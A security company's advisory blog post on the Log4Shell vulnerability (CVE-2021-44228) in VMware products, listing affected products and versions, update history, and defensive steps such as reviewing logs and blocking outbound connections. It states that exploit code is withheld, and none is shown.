Beyond vulnerability scanning: Enhancing attack surface management for more proactive security

December 11, 2021

VMSA-2021-0028: VMware Log4Shell Impact & Remediations

By: Randori Attack Team

Share on facebook
Share on twitter
Share on linkedin

Last Update: 9:48 am EDT, Jan. 10, 2022

  • Added new knowledgebase articles for several VMware products detailing mitigations
  • Added workaround for VMware vRealize Automation, VMware Workspace ONE Access Connector (VMware Identity Manager Connector), VMware vRealize Orchestrator, VMware AppDefense Appliance, VMware Cloud Director Object Storage Extension, VMware vRealize Log Insight, VMware AppDefense Appliance, VMware Cloud Director Object Storage Extension v2.0.x, VMware vRealize Log Insight, VMware Tanzu Scheduler, VMware Smart Assurance NCM, VMware Smart Assurance SAM [Service Assurance Manager], VMware Integrated OpenStack, VMware vRealize Business for Cloud, VMware vRealize Network Insight
  • Updated list of impacted applications
  • Corrected VMware Tanzu GemFire entry
  • Added mitigation for VMware HCX
  • Added mitigations for VMware Cloud Provider Lifecycle Manager ,VMware SD-WAN VCO, VMware NSX-T Intelligence Appliance, VMware Horizon Agents Installer, VMware Tanzu Observability Proxy, VMware Smart Assurance M&R, VMware Harbor Container Registry for TKGI, VMware vRealize Operations Tenant App for VMware Cloud Director

Situation Report: VMSA-2021-0028

A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j 2 utility was disclosed publicly via the project’s GitHub on December 9, 2021. This vulnerability, impacts multiple VMware products. VMware has assigned VMSA-2021-0028 to this issue and has begun to release mitigations. The Randori Attack Team can confirm exploitability of VMWare products in live environments (VMSA-2021-0028) via Log4j (CVE-2021-44228) aka “Log4Shell”. Randori has been in contact with VMware and is providing relevant information to their teams but will not release proof-of-concept code.

This is a critical vulnerability and impacted organizations should take immediate action. This post will be regularly updated, but follow @RandoriAttack for immediate updates. 

Impact

The Log4j 2 library is very frequently used in enterprise Java software. Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come. Randori has validated exploitability with a working exploit, and anticipate widespread exploitation by threat actors imminently. Randori has been in contact with the VMWare team to assist their development of mitigations

Impacted products:

  • VMware Horizon (8.x, 7.x)
  • VMware vCenter Server (7.x, 6.5.x, 6.7.x)
  • VMware HCX (4.1, 4.2, 4.0, 3.x)
  • VMware NSX-T Data Center (3.x, 2.x)
  • VMware Unified Access Gateway (21.x, 20.x, 3.x)
  • VMware Workspace ONE Access (21.x, 20.x)
  • VMware Identity Manager (3.x)
  • VMware vRealize Operations (8.x)
  • VMware vRealize Operations Cloud Proxy (Any)
  • VMware vRealize Log Insight (8.x)
  • VMware vRealize Automation (8.x, 7.6)
  • VMware Telco Cloud Automation (2.x, 1.x)
  • VMware Carbon Black Cloud Workload Appliance (1.x)
  • VMware Site Recovery Manager (8.x)
  • VMware Tanzu Gemfire (1.14.x, 1.13.x, 1.10.x)
  • VMware Tanzu Greenplum (6.x)
  • VMware Tanzu Operations Manager (2.x)
  • VMware Tanzu Application Service for VMs (2.x)
  • VMware Tanzu Kubernetes Grid Integrated Edition (1.x)
  • VMware Tanzu Observability by Wavefront Nozzle (3.x, 2.x)
  • Healthware for Tanzu Application Service (2.x, 1.x)
  • Spring Cloud Services for VMware Tanzu (3.x)
  • Spring Cloud Gateway for VMware Tanzu (1.x)
  • Spring Cloud Gateway for Kubernetes (1.x)
  • API Portal for VMware Tanzu (1.x)
  • Single Sign-On for VMware Tanzu Application Service (1.x)
  • App Metrics (2.x)
  • VMware vCenter Cloud Gateway (1.x)
  • VMware Tanzu SQL with MySQL for VMs (1.x, 2.x)
  • vRealize Orchestrator (7.6, 8.x)
  • VMware Cloud Foundation (4.x, 3.x)
  • VMware Workspace ONE Access Connector (21.x, 20.10.x, 19.03.0.1)
  • VMware Horizon DaaS (9.1.x, 9.0.x)
  • VMware Horizon Cloud Connector (1.x, 2.x)
  • VMware NSX Data Center for vSphere (6.x)
  • VMware AppDefense Appliance (2.x)
  • VMware Cloud Director Object Storage Extension (2.1.x, 2.0.x)
  • VMware Telco Cloud Operations (1.x)
  • VMware vRealize Log Insight (8.2, 8.3, 8.4, 8.6)
  • VMware Tanzu Scheduler (1.x)
  • VMware Smart Assurance NCM (10.1.6)
  • VMware Smart Assurance SAM [Service Assurance Manager] (10.1.2, 10.1.5)
  • VMware Integrated OpenStack (7.x)
  • VMware vRealize Business for Cloud (7.x)
  • VMware vRealize Network Insight (5.3, 6.x)
  • VMware Cloud Provider Lifecycle Manager (1.x)
  • VMware SD-WAN VCO (4.x)
  • VMware NSX-T Intelligence Appliance (1.2.x, 1.1.x)
  • VMware Horizon Agents Installer (21.x.x, 20.x.x)
  • VMware Tanzu Observability Proxy (10.x)
  • VMware Smart Assurance M&R (6.8u5, 7.0u8, 7.2.0.1)
  • VMware Harbor Container Registry for TKGI (2.x)
  • VMware vRealize Operations Tenant App for VMware Cloud Director (2.5)

Remediations & Recommendations

If running a VMware product impacted by VMSA-2021-0028, Randori recommends organizations take immediate action and do the following: 

  • Assume compromise and review logs for signs of malicious activity.
  • Configure firewalls to prevent outbound connections.  
  • Review VMSA-2021-0028 for mitigations and release of patches. 
  • Monitor our Log4Shell Attacker Note for impact of Log4Shell beyond VMware
  • Follow @RandoriAttack and @VMWareSRC for updates.

Links to product specific mitigations below: (Last update 4:09 pm ET, Jan. 7, 2022

If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly. 

Additional Log4j Research from Randori

Gain an Attacker's Perspective

Uncover your true attack surface with the only ASM platform built by attackers. Stay one step ahead of cyber-criminals, hacktivists and nation-state attackers, by seeing your perimeter as they see it.